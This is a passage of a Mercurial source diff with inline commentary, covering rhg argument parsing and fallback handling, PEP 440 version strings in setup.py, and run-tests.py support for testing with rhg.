+ } else if let Some(value) = arg.drop_prefix(b"-R") {
+ repo = Some(value.to_owned())
+ }
+ }
+ Self { config, repo, cwd }
}
}
-impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::cat::CatCommand<'a> {
- type Error = CommandError;
+/// What to do when encountering some unsupported feature.
+///
+/// See `HgError::UnsupportedFeature` and `CommandError::UnsupportedFeature`.
+enum OnUnsupported {
+ /// Print an error message describing what feature is not supported,
+ /// and exit with code 252.
+ Abort,
+ /// Silently exit with code 252.
+ AbortSilent,
+ /// Try running a Python implementation
+ Fallback { executable: Vec<u8> },
+}
+
+impl OnUnsupported {
+ const DEFAULT: Self = OnUnsupported::Abort;
- fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> {
- let rev = args.value_of("rev");
- let files = match args.values_of("files") {
- Some(files) => files.collect(),
- None => vec![],
- };
- Ok(commands::cat::CatCommand::new(rev, files))
+ fn from_config(ui: &Ui, config: &Config) -> Self {
+ match config
+ .get(b"rhg", b"on-unsupported")
+ .map(|value| value.to_ascii_lowercase())
+ .as_deref()
+ {
+ Some(b"abort") => OnUnsupported::Abort,
+ Some(b"abort-silent") => OnUnsupported::AbortSilent,
+ Some(b"fallback") => OnUnsupported::Fallback {
+ executable: config
+ .get(b"rhg", b"fallback-executable")
+ .unwrap_or_else(|| {
+ exit_no_fallback(
+ ui,
+ Self::Abort,
+ Err(CommandError::abort(
+ "abort: 'rhg.on-unsupported=fallback' without \
+ 'rhg.fallback-executable' set."
+ )),
+ false,
+ )
+ })
+ .to_owned(),
+ },
+ None => Self::DEFAULT,
+ Some(_) => {
+ // TODO: warn about unknown config value
+ Self::DEFAULT
+ }
+ }
}
}
-impl<'a> TryFrom<&'a ArgMatches<'_>>
- for commands::debugdata::DebugDataCommand<'a>
-{
- type Error = CommandError;
+const SUPPORTED_EXTENSIONS: &[&[u8]] = &[b"blackbox", b"share"];
+
+fn check_extensions(config: &Config) -> Result<(), CommandError> {
+ let enabled = config.get_section_keys(b"extensions");
+
+ let mut unsupported = enabled;
+ for supported in SUPPORTED_EXTENSIONS {
+ unsupported.remove(supported);
+ }
- fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> {
- let rev = args
- .value_of("rev")
- .expect("rev should be a required argument");
- let kind = match (
- args.is_present("changelog"),
- args.is_present("manifest"),
- ) {
- (true, false) => DebugDataKind::Changelog,
- (false, true) => DebugDataKind::Manifest,
- (true, true) => {
- unreachable!("Should not happen since options are exclusive")
- }
- (false, false) => {
- unreachable!("Should not happen since options are required")
- }
- };
- Ok(commands::debugdata::DebugDataCommand::new(rev, kind))
+ if let Some(ignored_list) =
+ config.get_simple_list(b"rhg", b"ignored-extensions")
+ {
+ for ignored in ignored_list {
+ unsupported.remove(ignored);
+ }
+ }
+
+ if unsupported.is_empty() {
+ Ok(())
+ } else {
+ Err(CommandError::UnsupportedFeature {
+ message: format_bytes!(
+ b"extensions: {} (consider adding them to 'rhg.ignored-extensions' config)",
+ join(unsupported, b", ")
+ ),
+ })
}
}
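
The `subcommands!` macro above keeps each command's module declaration, its
clap registration, and its entry in the name-to-function dispatch table in a
single list, so adding a command stays a one-line change. Hand-expanded for a
single `root` command it is roughly the following sketch (stand-in types; the
real `commands::root` additionally exposes an `args()` builder consumed by
`add_subcommand_args`):

    struct CliInvocation; // stand-in for rhg's real invocation context

    #[derive(Debug)]
    struct CommandError;

    mod commands {
        pub mod root {
            use crate::{CliInvocation, CommandError};

            pub fn run(_invocation: &CliInvocation) -> Result<(), CommandError> {
                println!("/path/to/repo"); // placeholder output
                Ok(())
            }
        }
    }

    type RunFn = fn(&CliInvocation) -> Result<(), CommandError>;

    fn subcommand_run_fn(name: &str) -> Option<RunFn> {
        match name {
            "root" => Some(commands::root::run),
            _ => None,
        }
    }

    fn main() {
        let run = subcommand_run_fn("root").expect("unknown subcommand");
        run(&CliInvocation).unwrap();
    }
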
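`EarlyArgs::parse`, also above, is a deliberately naive scan: it only needs to
recognize `--config`, `--cwd`, and `-R`/`--repository` well enough to load
configuration before clap parses the full command line, accepting both the
space-separated and the `=`/attached spellings of each option. The same
technique, trimmed to `--config` and the repository flags and operating on
`&str` instead of byte strings, as a self-contained sketch:

    fn parse_early(
        args: impl IntoIterator<Item = String>,
    ) -> (Vec<String>, Option<String>) {
        let mut args = args.into_iter();
        let mut config = Vec::new();
        let mut repo = None;
        // `while let` rather than `for`, so the body can also pull the *next*
        // argument when it sees a space-separated `--config VALUE`.
        while let Some(arg) = args.next() {
            if arg == "--config" {
                if let Some(value) = args.next() {
                    config.push(value);
                }
            } else if let Some(value) = arg.strip_prefix("--config=") {
                config.push(value.to_owned());
            } else if arg == "--repository" || arg == "-R" {
                repo = args.next();
            } else if let Some(value) = arg.strip_prefix("--repository=") {
                repo = Some(value.to_owned());
            } else if let Some(value) = arg.strip_prefix("-R") {
                // Attached short-option form: `-R./foo`
                repo = Some(value.to_owned());
            }
        }
        (config, repo)
    }

    fn main() {
        let argv = ["--config", "ui.color=no", "-R./foo", "log"]
            .iter()
            .map(|s| s.to_string());
        assert_eq!(
            parse_early(argv),
            (vec!["ui.color=no".to_string()], Some("./foo".to_string()))
        );
    }
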
--- a/rust/rhg/src/ui.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/ui.rs Tue Apr 20 11:01:06 2021 -0400
@@ -49,11 +49,6 @@
stderr.flush().or_else(handle_stderr_error)
}
-
- /// Write string line to stderr
- pub fn writeln_stderr_str(&self, s: &str) -> Result<(), UiError> {
- self.write_stderr(&format!("{}\n", s).as_bytes())
- }
}
/// A buffered stdout writer for faster batch printing operations.
--- a/setup.py Thu Mar 25 19:06:28 2021 -0400
+++ b/setup.py Tue Apr 20 11:01:06 2021 -0400
@@ -419,9 +419,9 @@
ltag = sysstr(hg.run(ltagcmd))
changessincecmd = ['log', '-T', 'x\n', '-r', "only(.,'%s')" % ltag]
changessince = len(hg.run(changessincecmd).splitlines())
- version = '%s+%s-%s' % (ltag, changessince, hgid)
+ version = '%s+hg%s.%s' % (ltag, changessince, hgid)
if version.endswith('+'):
- version += time.strftime('%Y%m%d')
+ version = version[:-1] + 'local' + time.strftime('%Y%m%d')
elif os.path.exists('.hg_archival.txt'):
kw = dict(
[[t.strip() for t in l.split(':', 1)] for l in open('.hg_archival.txt')]
@@ -430,11 +430,13 @@
version = kw['tag']
elif 'latesttag' in kw:
if 'changessincelatesttag' in kw:
- version = '%(latesttag)s+%(changessincelatesttag)s-%(node).12s' % kw
+ version = (
+ '%(latesttag)s+hg%(changessincelatesttag)s.%(node).12s' % kw
+ )
else:
- version = '%(latesttag)s+%(latesttagdistance)s-%(node).12s' % kw
+ version = '%(latesttag)s+hg%(latesttagdistance)s.%(node).12s' % kw
else:
- version = kw.get('node', '')[:12]
+ version = '0+hg' + kw.get('node', '')[:12]
if version:
versionb = version
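
Worked example of the new scheme: a tag 5.7.1 sitting 2 commits ahead at node
a1b2c3d4e5f6 is now rendered as `5.7.1+hg2.a1b2c3d4e5f6` (previously
`5.7.1+2-a1b2c3d4e5f6`), and a dirty working directory, whose node carries a
trailing `+`, becomes `5.7.1+hg2.a1b2c3d4e5f6local20210420` instead of ending
up with a second `+` before the date. Everything after the first `+` is now
alphanumerics and periods, which fits PEP 440's local-version grammar and so
survives normalization by packaging tools.
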
@@ -451,20 +453,6 @@
),
)
-try:
- oldpolicy = os.environ.get('HGMODULEPOLICY', None)
- os.environ['HGMODULEPOLICY'] = 'py'
- from mercurial import __version__
-
- version = __version__.version
-except ImportError:
- version = b'unknown'
-finally:
- if oldpolicy is None:
- del os.environ['HGMODULEPOLICY']
- else:
- os.environ['HGMODULEPOLICY'] = oldpolicy
-
class hgbuild(build):
# Insert hgbuildmo first so that files in mercurial/locale/ are found
@@ -609,6 +597,12 @@
# and its build is not explicitly disabled (for external build
# as Linux distributions would do)
if self.distribution.rust and self.rust:
+ if not sys.platform.startswith('linux'):
+ self.warn(
+ "rust extensions have only been tested on Linux "
+ "and may not behave correctly on other platforms"
+ )
+
for rustext in ruststandalones:
rustext.build('' if self.inplace else self.build_lib)
@@ -823,6 +817,22 @@
if not os.path.exists(dest):
shutil.copy(buf.value, dest)
+ # Also overwrite python3.dll so that hgext.git is usable.
+ # TODO: also handle the MSYS flavor
+ if sys.version_info[0] >= 3:
+ python_x = os.path.join(
+ os.path.dirname(fsdecode(buf.value)),
+ "python3.dll",
+ )
+
+ if os.path.exists(python_x):
+ dest = os.path.join(
+ os.path.dirname(self.hgtarget),
+ os.path.basename(python_x),
+ )
+
+ shutil.copy(python_x, dest)
+
if not pythonlib:
log.warn(
'could not determine Python DLL filename; assuming pythonXY'
@@ -1677,8 +1687,8 @@
# unicode on Python 2 still works because it won't contain any
# non-ascii bytes and will be implicitly converted back to bytes
# when operated on.
-assert isinstance(version, bytes)
-setupversion = version.decode('ascii')
+assert isinstance(version, str)
+setupversion = version
extra = {}
@@ -1706,7 +1716,7 @@
extra['console'] = [
{
'script': 'hg',
- 'copyright': 'Copyright (C) 2005-2021 Matt Mackall and others',
+ 'copyright': 'Copyright (C) 2005-2021 Olivia Mackall and others',
'product_version': version,
}
]
@@ -1782,7 +1792,7 @@
setup(
name='mercurial',
version=setupversion,
- author='Matt Mackall and many others',
+ author='Olivia Mackall and many others',
author_email='mercurial@mercurial-scm.org',
url='https://mercurial-scm.org/',
download_url='https://mercurial-scm.org/release/',
--- a/tests/common-pattern.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/common-pattern.py Tue Apr 20 11:01:06 2021 -0400
@@ -20,7 +20,6 @@
br'phases%253Dheads%250A'
br'pushkey%250A'
br'remote-changegroup%253Dhttp%252Chttps%250A'
- br'rev-branch-cache%250A'
br'stream%253Dv2',
# (the replacement patterns)
br'$USUAL_BUNDLE_CAPS$',
@@ -53,7 +52,6 @@
br'phases%3Dheads%0A'
br'pushkey%0A'
br'remote-changegroup%3Dhttp%2Chttps%0A'
- br'rev-branch-cache%0A'
br'stream%3Dv2',
# (replacement patterns)
br'$USUAL_BUNDLE2_CAPS$',
@@ -70,8 +68,7 @@
br'listkeys%0A'
br'phases%3Dheads%0A'
br'pushkey%0A'
- br'remote-changegroup%3Dhttp%2Chttps%0A'
- br'rev-branch-cache',
+ br'remote-changegroup%3Dhttp%2Chttps',
# (replacement patterns)
br'$USUAL_BUNDLE2_CAPS_SERVER$',
),
@@ -85,7 +82,6 @@
br'listkeys%0A'
br'pushkey%0A'
br'remote-changegroup%3Dhttp%2Chttps%0A'
- br'rev-branch-cache%0A'
br'stream%3Dv2',
# (replacement patterns)
br'$USUAL_BUNDLE2_CAPS_NO_PHASES$',
--- a/tests/flagprocessorext.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/flagprocessorext.py Tue Apr 20 11:01:06 2021 -0400
@@ -31,28 +31,28 @@
return False
-def noopdonothing(self, text, sidedata):
+def noopdonothing(self, text):
return (text, True)
def noopdonothingread(self, text):
- return (text, True, {})
+ return (text, True)
-def b64encode(self, text, sidedata):
+def b64encode(self, text):
return (base64.b64encode(text), False)
def b64decode(self, text):
- return (base64.b64decode(text), True, {})
+ return (base64.b64decode(text), True)
-def gzipcompress(self, text, sidedata):
+def gzipcompress(self, text):
return (zlib.compress(text), False)
def gzipdecompress(self, text):
- return (zlib.decompress(text), True, {})
+ return (zlib.decompress(text), True)
def supportedoutgoingversions(orig, repo):
--- a/tests/hghave.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/hghave.py Tue Apr 20 11:01:06 2021 -0400
@@ -140,9 +140,22 @@
"""Return the match object if cmd executes successfully and its output
is matched by the supplied regular expression.
"""
+
+ # Tests on Windows have to fake USERPROFILE to point to the test area so
+ # that `~` is properly expanded on py3.8+. However, some tools like black
+ # make calls that need the real USERPROFILE in order to run `foo --version`.
+ env = os.environ
+ if os.name == 'nt':
+ env = os.environ.copy()
+ env['USERPROFILE'] = env['REALUSERPROFILE']
+
r = re.compile(regexp)
p = subprocess.Popen(
- cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
+ cmd,
+ shell=True,
+ stdout=subprocess.PIPE,
+ stderr=subprocess.STDOUT,
+ env=env,
)
s = p.communicate()[0]
ret = p.returncode
@@ -188,6 +201,11 @@
return 'CHGHG' in os.environ
+@check("rhg", "running with rhg as 'hg'")
+def has_rhg():
+ return 'RHG_INSTALLED_AS_HG' in os.environ
+
+
@check("cvs", "cvs client/server")
def has_cvs():
re = br'Concurrent Versions System.*?server'
@@ -591,7 +609,7 @@
return matchoutput("pylint --help", br"Usage:[ ]+pylint", True)
-@check("clang-format", "clang-format C code formatter")
+@check("clang-format", "clang-format C code formatter (>= 11)")
def has_clang_format():
m = matchoutput('clang-format --version', br'clang-format version (\d+)')
# style changed somewhere between 10.x and 11.x
@@ -702,6 +720,12 @@
return os.path.isdir(os.path.join(t, "..", ".hg"))
+@check("network-io", "whether tests are allowed to access 3rd party services")
+def has_network_io():
+ t = os.environ.get("HGTESTS_ALLOW_NETIO")
+ return t == "1"
+
+
@check("curses", "terminfo compiler and curses module")
def has_curses():
try:
@@ -1034,7 +1058,7 @@
return matchoutput('sqlite3 -version', br'^3\.\d+')
-@check('vcr', 'vcr http mocking library')
+@check('vcr', 'vcr http mocking library (pytest-vcr)')
def has_vcr():
try:
import vcr
@@ -1054,7 +1078,7 @@
return matchoutput('emacs --version', b'GNU Emacs 2(4.4|4.5|5|6|7|8|9)')
-@check('black', 'the black formatter for python')
+@check('black', 'the black formatter for python (>= 20.8b1)')
def has_black():
blackcmd = 'black --version'
version_regex = b'black, version ([0-9a-b.]+)'
--- a/tests/logexceptions.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/logexceptions.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# logexceptions.py - Write files containing info about Mercurial exceptions
#
-# Copyright 2017 Matt Mackall <mpm@selenic.com>
+# Copyright 2017 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/tests/remotefilelog-getflogheads.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/remotefilelog-getflogheads.py Tue Apr 20 11:01:06 2021 -0400
@@ -5,6 +5,9 @@
hg,
registrar,
)
+from mercurial.utils import (
+ urlutil,
+)
cmdtable = {}
command = registrar.command(cmdtable)
@@ -18,10 +21,13 @@
Used for testing purpose
"""
- dest = repo.ui.expandpath(b'default')
+ dest = urlutil.get_unique_pull_path(b'getflogheads', repo, ui)[0]
peer = hg.peer(repo, {}, dest)
- flogheads = peer.x_rfl_getflogheads(path)
+ try:
+ flogheads = peer.x_rfl_getflogheads(path)
+ finally:
+ peer.close()
if flogheads:
for head in flogheads:
--- a/tests/run-tests.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/run-tests.py Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# run-tests.py - Run a set of tests on Mercurial
#
-# Copyright 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -301,6 +301,7 @@
while time.time() - start < timeout and p.returncode is None:
time.sleep(0.1)
p.timeout = True
+ vlog('# Timeout reached for process %d' % p.pid)
if p.returncode is None:
terminate(p)
@@ -540,6 +541,11 @@
action="store_true",
help="show chg debug logs",
)
+ hgconf.add_argument(
+ "--rhg",
+ action="store_true",
+ help="install and use rhg Rust implementation in place of hg",
+ )
hgconf.add_argument("--compiler", help="compiler to build with")
hgconf.add_argument(
'--extra-config-opt',
@@ -552,6 +558,7 @@
"--local",
action="store_true",
help="shortcut for --with-hg=<testdir>/../hg, "
+ "--with-rhg=<testdir>/../rust/target/release/rhg if --rhg is set, "
"and --with-chg=<testdir>/../contrib/chg/chg if --chg is set",
)
hgconf.add_argument(
@@ -580,6 +587,11 @@
help="use specified chg wrapper in place of hg",
)
hgconf.add_argument(
+ "--with-rhg",
+ metavar="RHG",
+ help="use specified rhg Rust implementation in place of hg",
+ )
+ hgconf.add_argument(
"--with-hg",
metavar="HG",
help="test using specified hg script rather than a "
@@ -667,13 +679,17 @@
parser.error('--rust cannot be used with --no-rust')
if options.local:
- if options.with_hg or options.with_chg:
- parser.error('--local cannot be used with --with-hg or --with-chg')
+ if options.with_hg or options.with_rhg or options.with_chg:
+ parser.error(
+ '--local cannot be used with --with-hg or --with-rhg or --with-chg'
+ )
testdir = os.path.dirname(_sys2bytes(canonpath(sys.argv[0])))
reporootdir = os.path.dirname(testdir)
pathandattrs = [(b'hg', 'with_hg')]
if options.chg:
pathandattrs.append((b'contrib/chg/chg', 'with_chg'))
+ if options.rhg:
+ pathandattrs.append((b'rust/target/release/rhg', 'with_rhg'))
for relpath, attr in pathandattrs:
binpath = os.path.join(reporootdir, relpath)
if os.name != 'nt' and not os.access(binpath, os.X_OK):
@@ -696,6 +712,8 @@
if (options.chg or options.with_chg) and os.name == 'nt':
parser.error('chg does not work on %s' % os.name)
+ if (options.rhg or options.with_rhg) and os.name == 'nt':
+ parser.error('rhg does not work on %s' % os.name)
if options.with_chg:
options.chg = False # no installation to temporary location
options.with_chg = canonpath(_sys2bytes(options.with_chg))
@@ -704,12 +722,28 @@
and os.access(options.with_chg, os.X_OK)
):
parser.error('--with-chg must specify a chg executable')
+ if options.with_rhg:
+ options.rhg = False # no installation to temporary location
+ options.with_rhg = canonpath(_sys2bytes(options.with_rhg))
+ if not (
+ os.path.isfile(options.with_rhg)
+ and os.access(options.with_rhg, os.X_OK)
+ ):
+ parser.error('--with-rhg must specify a rhg executable')
if options.chg and options.with_hg:
# chg shares installation location with hg
parser.error(
'--chg does not work when --with-hg is specified '
'(use --with-chg instead)'
)
+ if options.rhg and options.with_hg:
+ # rhg shares installation location with hg
+ parser.error(
+ '--rhg does not work when --with-hg is specified '
+ '(use --with-rhg instead)'
+ )
+ if options.rhg and options.chg:
+ parser.error('--rhg and --chg do not work together')
if options.color == 'always' and not pygmentspresent:
sys.stderr.write(
@@ -1338,6 +1372,7 @@
env['TESTNAME'] = self.name
env['HOME'] = _bytes2sys(self._testtmp)
if os.name == 'nt':
+ env['REALUSERPROFILE'] = env['USERPROFILE']
# py3.8+ ignores HOME: https://bugs.python.org/issue36264
env['USERPROFILE'] = env['HOME']
formated_timeout = _bytes2sys(b"%d" % default_defaults['timeout'][1])
@@ -2278,7 +2313,7 @@
if test.path.endswith(b'.t'):
rename(test.errpath, test.path)
else:
- rename(test.errpath, '%s.out' % test.path)
+ rename(test.errpath, b'%s.out' % test.path)
accepted = True
if not accepted:
self.faildata[test.name] = b''.join(lines)
@@ -3098,6 +3133,25 @@
chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
self._hgcommand = os.path.basename(self.options.with_chg)
+ # configure fallback and replace "hg" command by "rhg"
+ rhgbindir = self._bindir
+ if self.options.rhg or self.options.with_rhg:
+ # Affects hghave.py
+ osenvironb[b'RHG_INSTALLED_AS_HG'] = b'1'
+ # Affects configuration. Alternatives would be setting configuration through
+ # `$HGRCPATH` but some tests override that, or changing `_hgcommand` to include
+ # `--config` but that disrupts tests that print command lines and check expected
+ # output.
+ osenvironb[b'RHG_ON_UNSUPPORTED'] = b'fallback'
+ osenvironb[b'RHG_FALLBACK_EXECUTABLE'] = os.path.join(
+ self._bindir, self._hgcommand
+ )
+ if self.options.rhg:
+ self._hgcommand = b'rhg'
+ elif self.options.with_rhg:
+ rhgbindir = os.path.dirname(os.path.realpath(self.options.with_rhg))
+ self._hgcommand = os.path.basename(self.options.with_rhg)
+
osenvironb[b"BINDIR"] = self._bindir
osenvironb[b"PYTHON"] = PYTHON
@@ -3116,6 +3170,8 @@
path.insert(2, realdir)
if chgbindir != self._bindir:
path.insert(1, chgbindir)
+ if rhgbindir != self._bindir:
+ path.insert(1, rhgbindir)
if self._testdir != runtestdir:
path = [self._testdir] + path
if self._tmpbindir != self._bindir:
@@ -3335,6 +3391,9 @@
if self.options.chg:
assert self._installdir
self._installchg()
+ if self.options.rhg:
+ assert self._installdir
+ self._installrhg()
log(
'running %d tests using %d parallel processes'
@@ -3696,6 +3755,33 @@
sys.stdout.write(out)
sys.exit(1)
+ def _installrhg(self):
+ """Install rhg into the test environment"""
+ vlog('# Performing temporary installation of rhg')
+ assert os.path.dirname(self._bindir) == self._installdir
+ assert self._hgroot, 'must be called after _installhg()'
+ cmd = b'"%(make)s" install-rhg PREFIX="%(prefix)s"' % {
+ b'make': b'make', # TODO: switch by option or environment?
+ b'prefix': self._installdir,
+ }
+ cwd = self._hgroot
+ vlog("# Running", cmd)
+ proc = subprocess.Popen(
+ cmd,
+ shell=True,
+ cwd=cwd,
+ stdin=subprocess.PIPE,
+ stdout=subprocess.PIPE,
+ stderr=subprocess.STDOUT,
+ )
+ out, _err = proc.communicate()
+ if proc.returncode != 0:
+ if PYTHON3:
+ sys.stdout.buffer.write(out)
+ else:
+ sys.stdout.write(out)
+ sys.exit(1)
+
def _outputcoverage(self):
"""Produce code coverage output."""
import coverage
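
Usage-wise the new harness flags compose as follows: `./run-tests.py --rhg`
performs a temporary `make install-rhg` and runs every test with rhg installed
as `hg`; `--local --rhg` instead picks up a prebuilt
`rust/target/release/rhg` from the source tree; and `--with-rhg=PATH` points
at an explicit binary with no installation step. In each case the harness
exports `RHG_ON_UNSUPPORTED=fallback` and `RHG_FALLBACK_EXECUTABLE` so that
invocations rhg cannot handle transparently re-run under the Python `hg` being
tested, plus `RHG_INSTALLED_AS_HG` so that `hghave` can gate rhg-specific
tests.
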
--- a/tests/simplestorerepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/simplestorerepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -106,7 +106,9 @@
_flagserrorclass = simplestoreerror
- def __init__(self, svfs, path):
+ def __init__(self, repo, svfs, path):
+ self.nullid = repo.nullid
+ self._repo = repo
self._svfs = svfs
self._path = path
@@ -300,7 +302,7 @@
text = rawtext
else:
r = flagutil.processflagsread(self, rawtext, flags)
- text, validatehash, sidedata = r
+ text, validatehash = r
if validatehash:
self.checkhash(text, node, rev=rev)
@@ -446,6 +448,7 @@
revisiondata=False,
assumehaveparentrevisions=False,
deltamode=repository.CG_DELTAMODE_STD,
+ sidedata_helpers=None,
):
# TODO this will probably break on some ordering options.
nodes = [n for n in nodes if n != nullid]
@@ -459,6 +462,7 @@
revisiondata=revisiondata,
assumehaveparentrevisions=assumehaveparentrevisions,
deltamode=deltamode,
+ sidedata_helpers=sidedata_helpers,
):
yield delta
@@ -550,7 +554,7 @@
if node in self._indexbynode:
if duplicaterevisioncb:
- duplicaterevisioncb(self, node)
+ duplicaterevisioncb(self, self.rev(node))
empty = False
continue
@@ -560,12 +564,12 @@
else:
text = mdiff.patch(self.revision(deltabase), delta)
- self._addrawrevision(
+ rev = self._addrawrevision(
node, text, transaction, linkrev, p1, p2, flags
)
if addrevisioncb:
- addrevisioncb(self, node)
+ addrevisioncb(self, rev)
empty = False
return not empty
@@ -687,7 +691,7 @@
class simplestorerepo(repo.__class__):
def file(self, f):
- return filestorage(self.svfs, f)
+ return filestorage(repo, self.svfs, f)
repo.__class__ = simplestorerepo
--- a/tests/svnxml.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/svnxml.py Tue Apr 20 11:01:06 2021 -0400
@@ -15,6 +15,7 @@
e['revision'] = entry.getAttribute('revision')
e['author'] = xmltext(entry.getElementsByTagName('author')[0])
e['msg'] = xmltext(entry.getElementsByTagName('msg')[0])
+ e['date'] = xmltext(entry.getElementsByTagName('date')[0])
e['paths'] = []
paths = entry.getElementsByTagName('paths')
if paths:
@@ -42,7 +43,7 @@
except AttributeError:
fp = sys.stdout
for e in entries:
- for k in ('revision', 'author', 'msg'):
+ for k in ('revision', 'author', 'date', 'msg'):
fp.write(('%s: %s\n' % (k, e[k])).encode('utf-8'))
for path, action, fpath, frev in sorted(e['paths']):
frominfo = b''
--- a/tests/test-acl.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-acl.t Tue Apr 20 11:01:06 2021 -0400
@@ -109,14 +109,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -175,14 +175,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -204,6 +204,7 @@
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
bundle2-input-bundle: 5 parts total
+ truncating cache/rbc-revs-v1 to 8
updating the branch cache
added 3 changesets with 3 changes to 3 files
bundle2-output-bundle: "HG20", 1 parts total
@@ -244,14 +245,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -283,6 +284,7 @@
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
bundle2-input-bundle: 5 parts total
+ truncating cache/rbc-revs-v1 to 8
updating the branch cache
added 3 changesets with 3 changes to 3 files
bundle2-output-bundle: "HG20", 1 parts total
@@ -323,14 +325,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -359,6 +361,7 @@
bundle2-input-bundle: 5 parts total
transaction abort!
rollback completed
+ truncating cache/rbc-revs-v1 to 8
abort: acl: user "fred" not allowed on "foo/file.txt" (changeset "ef1ea85a6374")
no rollback information available
0:6675d58eff77
@@ -393,14 +396,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -468,14 +471,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -540,14 +543,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
